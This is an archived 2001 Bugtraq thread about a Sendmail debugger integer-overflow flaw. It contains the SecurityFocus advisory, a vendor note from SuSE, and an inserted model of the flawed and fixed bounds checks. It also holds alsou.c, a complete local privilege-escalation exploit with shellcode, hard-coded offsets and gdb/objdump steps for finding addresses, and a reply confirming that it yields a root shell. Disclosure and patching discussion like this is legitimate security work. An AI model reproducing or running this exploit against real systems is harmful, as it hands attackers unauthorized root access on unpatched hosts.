6948730 2001-08-21 10:04 -0600  /309 lines/ Dave Ahmed <da@securityfocus.com>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21  18:27  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18881>
Subject: *ALERT* UPDATED BID 3163 (URGENCY 6.58): Sendmail Debugger Arbitrary Code Execution Vulnerability (fwd)
------------------------------------------------------------
From: Dave Ahmed <da@securityfocus.com>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.GSO.4.30.0108210958500.2723-100000@mail>


This alert is being posted to Bugtraq as our public release of the
vulnerability discovered in Sendmail by Cade Cairns
<cairnsc@securityfocus.com>.

---------------------------------------------------------------------------
                              Security Alert

Subject:      Sendmail Debugger Arbitrary Code Execution Vulnerability
BUGTRAQ ID:   3163                   CVE ID:         CAN-2001-0653
Published:    August 17, 2001 MT     Updated:        August 20, 2001 MT

Remote:       No                     Local:          Yes
Availability: Always                 Authentication: Not Required
Credibility:  Vendor Confirmed       Ease:           No Exploit Available
Class:        Input Validation Error

Impact:   10.00          Severity: 7.50            Urgency:  6.58

Last Change:  Updated packages that rectify this issue are now available
              from Sendmail.
---------------------------------------------------------------------------

Vulnerable Systems:

  Sendmail Consortium Sendmail 8.12beta7
  Sendmail Consortium Sendmail 8.12beta5
  Sendmail Consortium Sendmail 8.12beta16
  Sendmail Consortium Sendmail 8.12beta12
  Sendmail Consortium Sendmail 8.12beta10
  Sendmail Consortium Sendmail 8.11.5
  Sendmail Consortium Sendmail 8.11.4
  Sendmail Consortium Sendmail 8.11.3
  Sendmail Consortium Sendmail 8.11.2
  Sendmail Consortium Sendmail 8.11.1
  Sendmail Consortium Sendmail 8.11

Non-Vulnerable Systems:



Summary:

  Sendmail contains an input validation error that may lead to the
  execution of arbitrary code with elevated privileges.

Impact:

  Local users may be able to write  arbitrary  data  to  process  memory,
  possibly  allowing  the  execution  of  code/commands   with   elevated
  privileges.

Technical Description:

  An input validation error exists in Sendmail's debugging functionality.

  The problem is the result of the use of signed integers in the program's
  tTflag() function, which is responsible for processing arguments supplied
  from the command line with the '-d' switch and writing the values to its
  internal "trace vector." The vulnerability exists because it is possible
  to cause a signed integer overflow by supplying a large numeric value for
  the 'category' part of the debugger arguments. The numeric value is used
  as an index for the trace vector.

  Before the vector is written to, a check is performed  to  ensure
  that the supplied index value is not greater than the size  of  the
  vector.  However, because a signed integer comparison is used, it
  is possible to bypass the check by  supplying  the  signed  integer
  equivalent  of  a negative value.  This may allow an attacker to
  write data  to  anywhere within a certain range of locations in
  process memory.

  Because the '-d' command-line switch is processed  before  the
  program drops its elevated  privileges,  this  could  lead  to  a
  full  system compromise.  This vulnerability has been successfully
  exploited  in  a laboratory environment.

Attack Scenarios:

  An attacker with local access must determine the memory offsets of
  the program's internal tTdvect variable and the location to which
  he or she wishes to have data written.

  The attacker must  craft  in  architecture  specific  binary  code  the
  commands (or 'shellcode') to be executed with  higher  privilege.   The
  attacker must then run the program, using the '-d' flag to overwrite  a
  function return address with the location of the supplied shellcode.

Exploits:

  Currently the SecurityFocus staff are not aware  of  any  exploits  for
  this issue. If you feel we are in error or are  aware  of  more  recent
  information,    please    mail    us    at:     vuldb@securityfocus.com
  <mailto:vuldb@securityfocus.com>.

Mitigating Strategies:

  Restrict local access to trusted users only.

Solutions:

  Below is a statement from the Sendmail Consortium regarding this issue:

  --------------------
  This vulnerability, present in sendmail open source versions between
  8.11.0 and 8.11.5, has been corrected in 8.11.6. sendmail 8.12.0.Beta
  users should upgrade to 8.12.0.Beta19. The problem was not present in
  8.10 or earlier versions. However, as always, we recommend using the
  latest version. Note that this problem is not remotely exploitable.
  Additionally, sendmail 8.12 will no longer use a set-user-id root
  binary by default.
  --------------------

  Updated packages that rectify this issue are available from the vendor:

  For Sendmail Consortium Sendmail 8.11:

    Sendmail Consortium upgrade sendmail 8.11.6
    ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz

  For Sendmail Consortium Sendmail 8.11.1:

    Sendmail Consortium upgrade sendmail 8.11.6
    ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz

  For Sendmail Consortium Sendmail 8.11.2:

    Sendmail Consortium upgrade sendmail 8.11.6
    ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz

  For Sendmail Consortium Sendmail 8.11.3:

    Sendmail Consortium upgrade sendmail 8.11.6
    ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz

  For Sendmail Consortium Sendmail 8.11.4:

    Sendmail Consortium upgrade sendmail 8.11.6
    ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz

  For Sendmail Consortium Sendmail 8.11.5:

    Sendmail Consortium upgrade sendmail 8.11.6
    ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz

  For Sendmail Consortium Sendmail 8.12beta10:

    Sendmail Consortium upgrade sendmail 8.12.0 Beta19
    ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz

  For Sendmail Consortium Sendmail 8.12beta12:

    Sendmail Consortium upgrade sendmail 8.12.0 Beta19
    ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz

  For Sendmail Consortium Sendmail 8.12beta16:

    Sendmail Consortium upgrade sendmail 8.12.0 Beta19
    ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz

  For Sendmail Consortium Sendmail 8.12beta5:

    Sendmail Consortium upgrade sendmail 8.12.0 Beta19
    ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz

  For Sendmail Consortium Sendmail 8.12beta7:

    Sendmail Consortium upgrade sendmail 8.12.0 Beta19
    ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz

Credit:

  Discovered by Cade Cairns <cairnsc@securityfocus.com> of the
  Security Focus SIA Threat Analysis Team.

References:

  web page:
  Sendmail Homepage (Sendmail)
  http://www.sendmail.org/

ChangeLog:

  Aug 20, 2001: Updated  packages  that  rectify  this  issue   are   now
                available from Sendmail.
  Aug 20, 2001: Updated versions of Sendmail will be available  today  at
                4:00 PDT.
  Aug 09, 2001: Initial analysis.

---------------------------------------------------------------------------

HOW TO INTERPRET THIS ALERT

            BUGTRAQ ID: This  is  a  unique  identifier  assigned  to   the
                        vulnerability by SecurityFocus.com.

                CVE ID: This  is  a  unique  identifier  assigned  to   the
                        vulnerability by the CVE.

             Published: The date the vulnerability was first made public.

               Updated: The date the information was last updated.

                Remote: Whether   this   is    a    remotely    exploitable
                        vulnerability.

                 Local: Whether   this    is    a    locally    exploitable
                        vulnerability.

           Credibility: Describes how credible the  information  about  the
                        vulnerability is. Possible values are:

                        Conflicting Reports: There are multiple
                        conflicting reports about the existence of the
                        vulnerability.

                        Single  Source:  There  is  a  single  non-reliable
                        source   reporting    the    existence    of    the
                        vulnerability.

                        Reliable Source: There is a single reliable
                        source reporting the existence of the
                        vulnerability.

                        Conflicting Details:  There  is  consensus  on  the
                        existence  of  the  vulnerability  but   not   its
                        details.

                        Multiple  Sources:  There  is  consensus   on   the
                        existence and details of the vulnerability.

                        Vendor Confirmed:  The  vendor  has
                        confirmed  the vulnerability.

                 Class: The class of vulnerability.  Possible  values  are:
                        Boundary Condition Error, Access Validation  Error,
                        Origin Validation Error,  Input  Validation  Error,
                        Failure  to  Handle  Exceptional  Conditions,  Race
                        Condition  Error,  Serialization  Error,  Atomicity
                        Error, Environment Error, and Configuration Error.

                  Ease: Rates  how  easily   the   vulnerability   can   be
                        exploited.  Possible   values   are:   No   Exploit
                        Available,  Exploit  Available,  and   No   Exploit
                        Required.

                Impact: Rates the impact of the vulnerability.  Its  range
                        is 1 through 10.

              Severity: Rates the severity of the vulnerability. Its  range
                        is 1 through 10.  It is computed  from  the  impact
                        rating and remote flag. Remote vulnerabilities with
                        a  high  impact  rating  receive  a  high  severity
                        rating. Local vulnerabilities  with  a  low  impact
                        rating receive a low severity rating.

               Urgency: Rates how quickly you should take action to fix  or
                        mitigate the vulnerability. Its range is 1  through
                        10. It is computed from the  severity  rating,  the
                        ease  rating,  and  the  credibility  rating.  High
                        severity vulnerabilities with a high  ease  rating,
                        and a high confidence rating have a higher  urgency
                        rating. Low severity  vulnerabilities  with  a  low
                        ease rating, and a low  confidence  rating  have  a
                        lower urgency rating.

           Last Change: The  last  change   made   to   the   vulnerability
                        information.

    Vulnerable Systems: The list of vulnerable systems. A '+'  preceding  a
                        system  name  indicates  that  one  of  the  system
                        components is vulnerable. For example, Windows 98
                        ships with Internet Explorer, so if a vulnerability
                        is found in IE you may see something like:
                        Microsoft Internet Explorer + Microsoft Windows 98

Non-Vulnerable Systems: The list of non-vulnerable systems.

               Summary: A concise summary of the vulnerability.

                Impact: The impact of the vulnerability.

 Technical Description: The in-depth description of the vulnerability.

      Attack Scenarios: Ways an attacker may make use of the vulnerability.

              Exploits: Exploit instructions or programs.

 Mitigating Strategies: Ways to mitigate the vulnerability.

             Solutions: Solutions to the vulnerability.

                Credit: Information about who disclosed the vulnerability.

            References: Sources of information on the vulnerability.

     Related Resources: Resources that might be of additional value.

             ChangeLog: History of changes to the vulnerability record.

---------------------------------------------------------------------------

                     Copyright 2001 SecurityFocus.com

                     https://alerts.securityfocus.com/
(6948730) /Dave Ahmed <da@securityfocus.com>/(Rewrapped)
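The signed-comparison bypass from the alert's Technical Description, modelled as an added example (this is not code from the alert or from sendmail; the parser, the function names and the vector size of 100 are assumptions): the check as described accepts a wrapped negative category, while the hardened check refuses it before anything is used as an index.

```c
#include <limits.h>
#include <stdbool.h>
/* Size of the modelled trace vector: an assumption for this example. */
#define TRACE_VECTOR_SIZE 100

/* One "-d first-last.level" debug argument, parsed into its three parts. */
struct trace_spec {
    int first;  /* first category (used as an array index) */
    int last;   /* last category (inclusive) */
    int level;  /* value stored for each category */
};

/* Accumulate digits as a naive int-building loop would; the unsigned sum is
 * mapped onto the int a signed accumulator wraps to: "4294967291" -> -5. */
static int digits_to_int(const char **sp)
{
    unsigned int acc = 0;
    while (**sp >= '0' && **sp <= '9')
        acc = acc * 10u + (unsigned int)(*(*sp)++ - '0');
    return acc > INT_MAX ? -(int)(UINT_MAX - acc) - 1 : (int)acc;
}

/* Parse "first[-last][.level]"; returns false if the spec is malformed. */
static bool parse_trace_spec(const char *s, struct trace_spec *out)
{
    if (*s < '0' || *s > '9')
        return false;
    out->first = digits_to_int(&s);
    out->last = out->first;
    if (*s == '-') {
        s++;
        out->last = digits_to_int(&s);
    }
    out->level = 1;
    if (*s == '.') {
        s++;
        out->level = digits_to_int(&s);
    }
    return *s == '\0';
}

/* The check as the alert describes it: signed ints compared only against
 * the upper bound, so a wrapped negative index is accepted. */
static bool range_accepted_signed(const struct trace_spec *t)
{
    return t->first <= TRACE_VECTOR_SIZE && t->last <= TRACE_VECTOR_SIZE;
}

/* Hardened check: both ends must lie inside [0, size) before either is used
 * as an index. Comparing as size_t would reject negatives just as well. */
static bool range_accepted_hardened(const struct trace_spec *t)
{
    return t->first >= 0 && t->first <= t->last && t->last < TRACE_VECTOR_SIZE;
}

/* 1 = accepted, 0 = refused by the chosen check, -1 = unparsable. */
int check_spec(const char *arg, bool hardened)
{
    struct trace_spec t;
    if (!parse_trace_spec(arg, &t))
        return -1;
    return (hardened ? range_accepted_hardened(&t) : range_accepted_signed(&t)) ? 1 : 0;
}

/* Store a spec into vect only when the hardened check passes; returns the
 * number of entries written (0 when the spec was refused). */
int apply_trace_spec(const char *arg, unsigned char *vect)
{
    struct trace_spec t;
    if (!parse_trace_spec(arg, &t) || !range_accepted_hardened(&t))
        return 0;
    for (int i = t.first; i <= t.last; i++)
        vect[i] = (unsigned char)t.level;
    return t.last - t.first + 1;
}

unsigned char demo_vect[TRACE_VECTOR_SIZE];  /* constructed target vector */
```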
6949602 2001-08-21 21:28 +0200  /82 lines/ Roman Drahtmueller <draht@suse.de>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21  21:51  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18890>
Comment on text 6948730 by Dave Ahmed <da@securityfocus.com>
Subject: Re: *ALERT* UPDATED BID 3163 (URGENCY 6.58): Sendmail Debugger Arbitrary Code Execution Vulnerability (fwd)
------------------------------------------------------------
From: Roman Drahtmueller <draht@suse.de>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0108212117080.9532-100000@dent.suse.de>

>
> Subject:      Sendmail Debugger Arbitrary Code Execution Vulnerability
[...]
> Vulnerable Systems:
>
>   Sendmail Consortium Sendmail 8.12beta7
>   Sendmail Consortium Sendmail 8.12beta5
>   Sendmail Consortium Sendmail 8.12beta16
>   Sendmail Consortium Sendmail 8.12beta12
>   Sendmail Consortium Sendmail 8.12beta10
>   Sendmail Consortium Sendmail 8.11.5
>   Sendmail Consortium Sendmail 8.11.4
>   Sendmail Consortium Sendmail 8.11.3
>   Sendmail Consortium Sendmail 8.11.2
>   Sendmail Consortium Sendmail 8.11.1
>   Sendmail Consortium Sendmail 8.11
[...]
> Non-Vulnerable Systems:

Some part is missing here...

> Summary:
>
>   Sendmail contains an input validation error, may lead to the  execution
>   of arbitrary code with elevated privileges.
[...]
>   --------------------
>   This vulnerability, present in sendmail open  source  versions  between
>   8.11.0 and 8.11.5 has been corrected in 8.11.6.   sendmail  8.12.0.Beta
>   users should upgrade to 8.12.0.Beta19.  The problem was not present  in
>   8.10 or earlier versions.  However, as always, we recommend  using  the
>   latest version.  Note that this problem is  not  remotely  exploitable.
>   Additionally, sendmail 8.12 will no  longer  uses  a  set-user-id  root
>   binary by default.
>   --------------------
[...]



SuSE are currently working on update packages for the 7.0, 7.1 and 7.2
distributions (which are affected). The supported distributions 6.3 and
6.4 come with sendmail-8.9.3 which does not seem to be vulnerable to this
problem. The packages should be available shortly at
ftp://ftp.suse.com/pub/suse/i386/update/*.



Offtopic and mentioned here to keep the noise down (in.telnetd):

The 7.x distribution update directories contain update packages for
the recently discovered in.telnetd security problem (buffer
overflow). While we are working on a solution for the 6.x
distribution, the available packages are ready for use. It is
recommended to apply these updates as soon as possible. The packages
for the 7.1 distribution are called nkitserv.rpm, for 7.2 it's called
telnet-server.rpm. The packages for the 6.x distributions are proving
to be troublesome because of a much older codebase and changed
behaviour of parts of the glibc. We hope to be able to provide a
suitable solution soon.

We recommend disabling the telnet service by commenting it out in
the /etc/inetd.conf file (followed by "killall -HUP inetd" to
make inetd re-read its config file) until an update package for your
distribution is available. If you do not need the telnet server
service, you should leave the service disabled even if you have
applied an update package to your system.

Thanks,
Roman Drahtmüller,
SuSE Security.
-- 
 -                                                                      -
| Roman Drahtmüller      <draht@suse.de> //          "Caution: Cape does |
  SuSE GmbH - Security           Phone: //       not enable user to fly."
| Nürnberg, Germany     +49-911-740530 // (Batman Costume warning label) |
 -                                                                      -
(6949602) /Roman Drahtmueller <draht@suse.de>/(Rewrapped)
6955800 2001-08-22 21:02 +0300  /16 lines/ Lucian Hudin <luci@warp.transart.ro>
Sent by: joel@lysator.liu.se
Imported: 2001-08-22  20:35  by Brevbäraren
External recipient: Dave Ahmed <da@securityfocus.com>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18904>
Comment on text 6948730 by Dave Ahmed <da@securityfocus.com>
Subject: sample exploit....Re: *ALERT* UPDATED BID 3163 (URGENCY 6.58): Sendmail Debugger Arbitrary Code Execution Vulnerability (fwd)
------------------------------------------------------------

This is a simple slack sendmail exploit (RH 7.1 offsets also included).
It's so funny to see an old bug striking again...

Regards,

LucySoft Inc.
www : http://www.darkpath.com
mail: luci@transart.ro (work), luci@darkpath.com (home)
(6955800) /Lucian Hudin <luci@warp.transart.ro>/----
Attachment (application/octet-stream) in text 6955801
6955801 2001-08-22 21:02 +0300  /9 lines/ Lucian Hudin <luci@warp.transart.ro>
Attachment filename: "xp.tar.gz"
Imported: 2001-08-22  20:35  by Brevbäraren
External recipient: Dave Ahmed <da@securityfocus.com>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18905>
Attachment (text/plain) to text 6955800
Subject: Attachment (xp.tar.gz) to: sample exploit....Re: *ALERT* UPDATED BID 3163 (URGENCY 6.58): Sendmail Debugger Arbitrary Code Execution Vulnerability (fwd)
------------------------------------------------------------
(6955801) /Lucian Hudin <luci@warp.transart.ro>/(Rewrapped)
6957305 2001-08-23 04:40 +0400  /5 lines/ Alexander Yurchenko <grange@rt.mipt.ru>
Sent by: joel@lysator.liu.se
Imported: 2001-08-23  03:30  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18913>
Subject: Another sendmail exploit
------------------------------------------------------------
Here's another sendmail exploit for linux x86.

   Alexander Yurchenko aka grange
(6957305) /Alexander Yurchenko <grange@rt.mipt.ru>/-
Attachment (text/plain) in text 6957306
6957306 2001-08-23 04:40 +0400  /107 lines/ Alexander Yurchenko <grange@rt.mipt.ru>
Attachment filename: "alsou.c"
Imported: 2001-08-23  03:30  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18914>
Attachment (text/plain) to text 6957305
Subject: Attachment (alsou.c) to: Another sendmail exploit
------------------------------------------------------------
/*
 * alsou.c
 *
 * sendmail-8.11.x linux x86 exploit
 *
 * To use this exploit you should know two numbers: VECT and GOT.
 * Use gdb to find the first:
 *
 * $ gdb -q /usr/sbin/sendmail 
 * (gdb) break tTflag 
 * Breakpoint 1 at 0x8080629
 * (gdb) r -d1-1.1
 * Starting program: /usr/sbin/sendmail -d1-1.1
 *
 * Breakpoint 1, 0x8080629 in tTflag ()
 * (gdb) disassemble tTflag
 * .............
 * 0x80806ea <tTflag+202>: dec    %edi
 * 0x80806eb <tTflag+203>: mov    %edi,0xfffffff8(%ebp)
 * 0x80806ee <tTflag+206>: jmp    0x80806f9 <tTflag+217>
 * 0x80806f0 <tTflag+208>: mov    0x80b21f4,%eax
 *                               ^^^^^^^^^^^^^^^^^^ address of VECT
 * 0x80806f5 <tTflag+213>: mov    %bl,(%esi,%eax,1)
 * 0x80806f8 <tTflag+216>: inc    %esi
 * 0x80806f9 <tTflag+217>: cmp    0xfffffff8(%ebp),%esi
 * 0x80806fc <tTflag+220>: jle    0x80806f0 <tTflag+208>
 * .............
 * (gdb) x/x 0x80b21f4
 * 0x80b21f4 <tTvect>:     0x080b9ae0
 *                        ^^^^^^^^^^^^^ VECT
 *
 * Use objdump to find the second:
 * $ objdump -R /usr/sbin/sendmail |grep setuid
 * 0809e07c R_386_JUMP_SLOT   setuid
 * ^^^^^^^^^ GOT
 *
 * Probably you should play with OFFSET to make exploit work.
 * 
 * Constant values, written in this code found for sendmail-8.11.4
 * on RedHat-6.2. For sendmail-8.11.0 on RedHat-6.2 try VECT = 0x080b9ae0 and
 * GOT = 0x0809e07c.
 *
 * To get r00t type ./alsou and then press Ctrl+C.
 * 
 *
 * grange <grange@rt.mipt.ru>
 *
 */
 
#include <sys/types.h>
#include <stdio.h>	/* sprintf, perror (header missing in the original) */
#include <stdlib.h>
#include <string.h>	/* strlen, strcat, memset (header missing in the original) */
#include <unistd.h>	/* execve (header missing in the original) */

#define OFFSET 1000
#define VECT 0x080baf20
#define GOT 0x0809f544

#define NOPNUM 1024

char shellcode[] =
	"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
	"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
	"\xc0\x88\x43\x07\x89\x5b\x08\x89"
	"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
	"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
	"/bin/sh";

/* Current stack pointer (i386 only). The original left the value in %eax
 * with no return statement; an output operand makes the return explicit. */
unsigned int get_esp(void)
{
	unsigned int esp;

	__asm__("movl %%esp,%0" : "=r"(esp));
	return esp;
}

int main(int argc, char *argv[])
{
	char *egg, s[256], tmp[256], *av[3], *ev[2];
	unsigned int got = GOT, vect = VECT, ret, first, last, i;

	/* EGG=<NOPs><shellcode>, passed to sendmail through the environment */
	egg = (char *)malloc(strlen(shellcode) + NOPNUM + 5);
	if (egg == NULL) {
		perror("malloc()");
		exit(-1);
	}
	sprintf(egg, "EGG=");
	memset(egg + 4, 0x90, NOPNUM);
	sprintf(egg + 4 + NOPNUM, "%s", shellcode);

	ret = get_esp() + OFFSET;

	/* build the -d argument string */
	sprintf(s, "-d");
	first = -vect - (0xffffffff - got + 1);
	last = first;
	while (ret) {
		i = ret & 0xff;
		sprintf(tmp, "%u-%u.%u-", first, last, i);
		strcat(s, tmp);
		last = ++first;
		ret = ret >> 8;
	}
	s[strlen(s) - 1] = '\0';	/* drop the trailing '-' */

	av[0] = "/usr/sbin/sendmail";
	av[1] = s;
	av[2] = NULL;
	ev[0] = egg;
	ev[1] = NULL;
	execve(*av, av, ev);
	perror("execve()");	/* only reached if execve fails */
	return 1;
}
(6957306) /Alexander Yurchenko <grange@rt.mipt.ru>/-
6961052 2001-08-23 09:33 +0200  /50 lines/ Michael Kjorling <michael@kjorling.com>
Sent by: joel@lysator.liu.se
Imported: 2001-08-23  16:30  by Brevbäraren
External recipient: Bugtraq <bugtraq@securityfocus.com>
Recipient: Bugtraq (import) <18919>
Comment on text 6957305 by Alexander Yurchenko <grange@rt.mipt.ru>
Subject: Re: Another sendmail exploit  [local root compromise]
------------------------------------------------------------
From: Michael Kjorling <michael@kjorling.com>
To: Bugtraq <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0108230920350.8982-100000@varg.wolfpack>

Sendmail 8.11.4 on Red Hat 6.2 and kernel 2.2.18 confirmed vulnerable
to this local root exploit with mail's shell both blank (meaning
/bin/bash) and /usr/sbin/smrsh 8.11 (Berkeley) 5/19/1998. I got dumped
into a root bash shell both times when starting this program as an
ordinary user. Sendmail 8.11.6 on same platform is confirmed *not* to
be vulnerable under the same two setups (with and without smrsh). smrsh
with 8.11.6 does not have an explicit version number but mentions
@(#)$Id: smrsh.c,v 8.31.4.9 2001/04/24 04:11:51 ca Exp $.

Is this the command line processing bug mentioned at
http://www.sendmail.org/8.11.html?


Michael Kjörling


On Aug 23 2001 04:40 +0400, Alexander Yurchenko wrote:

> Here's an another sendmail exploit for linux x86.
>
>    Alexander Yurchenko aka grange

-- 
Michael Kjörling - michael@kjorling.com - PGP: 8A70E33E
Manager Wolf.COM -- Programmer -- Network Administrator
"We must be the change we wish to see" (Mahatma Gandhi)

^..^     Support the wolves in Norway -- go to     ^..^
 \/   http://home.no.net/ulvelist/protest_int.htm   \/

***** Please only send me emails which concern me *****

(6961052) /Michael Kjorling <michael@kjorling.com>/-